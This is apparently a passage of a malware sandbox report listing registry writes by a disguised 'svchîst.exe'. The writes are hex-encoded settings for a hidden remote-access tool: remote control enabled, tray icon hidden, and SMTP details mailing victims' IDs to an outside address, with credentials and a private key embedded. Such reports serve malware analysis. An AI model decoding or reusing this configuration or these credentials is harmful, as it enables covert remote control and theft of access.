61445a3152566b30563068364d553557436d7772646d646951546c5956566834516e424655466849647a5531646c687a5545394352454572626b35474d30785455335a714e554a5451304a61633151355a584255656c4e766257644d52557435635459345758554b57555a354e4735516432643053456869576e68685346524e62336b34596a465756564e765557787762305a6862486478643152715355786d52336442556b70736132525263325579554730795130356b614578316467704664306c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b4652516e67344d6b784b4e6c56474c326c354e334e4f616d646d596d744361334245616d557756573076436e564354566c4e624564594c334a536445355a4d6d4a365648564962446844566a6c6e4e7a5649596c5a4451326c615931684d636c424d4d7a42745a455979515778545447457764304e75617a525a596c566d636b4d4b4d336430617a4a6e53327076556e5a7a5657396159326f31596a5268566e427055325a6f656b3572545535515579744a566d4d3256433832646c637a516d497a64334d31536c42564e6a55326332706e5333464b4f51705364474a77596d464b566d35755747647a557a4e465157307a536b597a636d64485a7a6855656e4d765a307431646b35586248564f5258706157473831596e453462564a445756646f5931497a4e45397061545253436e4a514c3245355a4656564e6d39686233685a6455464863554a6854553135526d745662324648617a52344b3345784e3270334e6e5648546b6858547a4a4655465a69643074446257784d4b336b34643056686156514b51334a3553574e4a5955467561324d3257553130515746754f584e7a63476446576b39545557685154474e5555335a5163315643636d6c614d6c68345155643355554e3262546b726248634b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a5355563264306c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b74726432646e553278425a3056425157394a516b465252457059626d3932566b6c574d5539425358594b556c5a4e52564d315a54457a56305632526a524655577456624535426130784f566d70574e445661656c644661454e52546b4d7a62697474516d5a4853553944566c55355656563663316b30527a42775a474a545241704c4e44517a623156366156467463584e734f4556744e444572656c6c595a6d746163325a6e4f564a734f53394c5645703362566c6962335270635752355a55396a4e32397862445a3162544a5a546e465763437472436d4d33537a41315256686d4f544e5554334a77616b644e55553947566c4a445a4468586231464e6448704b52484a4c536e6872596e686852584a5561584642565578425a6c464e6346704f4b7a5a7853484530556d6f4b61466c6d55465578563167324b304a7a5244466b556d5a46523274524f574e6d524735744f5756334f44524654555132597a42595933524b5379745161305a4a53555a74654641784e6d7851546b74705955467a5551707953334a7965476b315a31684d61574d7651304d7759325230626b5a765a453135616b7834646c5a57556b746f513164745a315a7857454e79516b394e5a335134596b464352573158556a46446544645a4b324a5a436b6b784d6b56314e6a68555157644e516b464252554e6e5a305642597a5a35576b4a694d556b79546d643163314a69615842495355564856544a305a56453353574a72636a4e554e4867764f465a4c57474a325769384b616b6f785a446c4861444642626b4a686132565a565552595a564e475743747456554a7252485a45516b6c59536a465762575a4753484644567a67764e54564354444a54626a526d55316c74576c524f546e68584d416f326155644c5579396e626b5269545652525755567554564268596e51345347567a5a6a6333546d4e6d517a6c3357574a59656e685055544a554d4578615358645a63455a6d56544a57566b6c575679393063303578436d7379536b6335523234354e537476596b7055526d4a34576d343153556c745533513564323559546d307a536a5a33647a566b6347593255445a7457544a4f52485671625555795a30647655306779543270485932734b5a6d6c5563577874646e645a4f46563463484d316155706b53336c765a5852755a45464a61553954656b773561454d335656524b63576c6e54553575596c56474c33564d614374795532464361324e335a6b645264416f725a6c46735356425154306851515855335632465753587074646e5a56524564704e444a4f656c5a475957564e4d3278554c7a4e335931464c516d645252446c57553078695957706b61584e6f565552474f565655436e647955315a4a595664326130497665557073547a52716347355553556f31636d63304d4535684e7a6445616d566b6557527851324e325630465263304e7a55486c70623068505a30737a596a6c586446465a596c4d4b4b304e55617a5a3653464e354d6c42355458464656336b345232646f64475270576d7733595849335356463165476850526b4a53527a42564e7a45344e58563455793935536c686b61567056516c4a594c305a3454516f3562574e7559326c5a6230704c54336c456248563263555261516b744363573548643074435a31464554475a56563370515a555531566b64734f55597755315669536b733355565176513239595257633255464935436b6b324d465676654770716547644556334e364e334e6a535731356133566e5a446835517a4d3054564e4b5a6b393065565a6d52485276536a4671625746544b334679516b73304d5339544e6d744a626b70436445554b55484977646d5a31516e4e5a555846365a554e4b62566b325245557652456c755333453262444d7754445a70557a4e495a6b3974595670474f466c434e6d7335566b35534e6b633553305656616d39474e5649325267705a64556c4d4d7a4a444c32465253304a6e55554d3063306376575578526158673453576b7a526a5649624752545954524d63545a6d57485644596c7074646c55726132315752466c32556d4e455a6b39585156686a436d686a52446c3465464a36525642475546645751574a724f564e31544768484e6a6847533056755232645364556b77566c45304e6e6456617a4e4e5647704d4e446477566a6857596b6c444f45465663464533646a594b656b70324f47314752484e4552445a59645864474c7a6861616e4e425447396d617a5977654535444b30746e534446574d6d4a6c546e5a78513055725257704b64555659546d354f536b7071643074435a3146444b777077626a5261545441335245466b4d574a324b303159526b74775a45643354446376574739686246646e54473530546c6b785344564d56316c5a544739705245464e59576434565646614f4731514c7a686f4d304a6a436c4e475a6d3431596b557a56576861616a644f4d6a4e695a304e4451316c7654437446546b647554553959533368716146645255544e53635868614c32464b6446413459585a445355744e647a5a686144646e4d6a514b4e474a4863326735534856514d45464353317034593368424c316330516a5668636e686c516a4274636b6c48614468715a456c525632745253304a6e5555523256335a6a5647567a55554e6c65474a6b6354497264517046626a6c3164484976553067334f574e3161574e324d58567165474e6c5a6a4d78556b467a56326c72516d6c54556d39365557747955574656646e466a546c464861465a4263325932526b63315330523657486479436b6b3161484a525a7939734b336b72534756744e6d5a4a616b786a536b783157565248537a59315555524e636d707264546372527a63776456427a4f44466862334679567a526d556b46786243387862476c704e6b634b566d686a4d6d63304b3370694e6e684d525339774e69744864303542546a42326345453950516f744c5330744c55564f52434251556b6c575156524649457446575330744c53307443673d3d3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e66616c73653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\CalendarRecordSettings = fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600390031003100300022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00 C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3832352d3433362d3835372d3835333c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e747275653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a 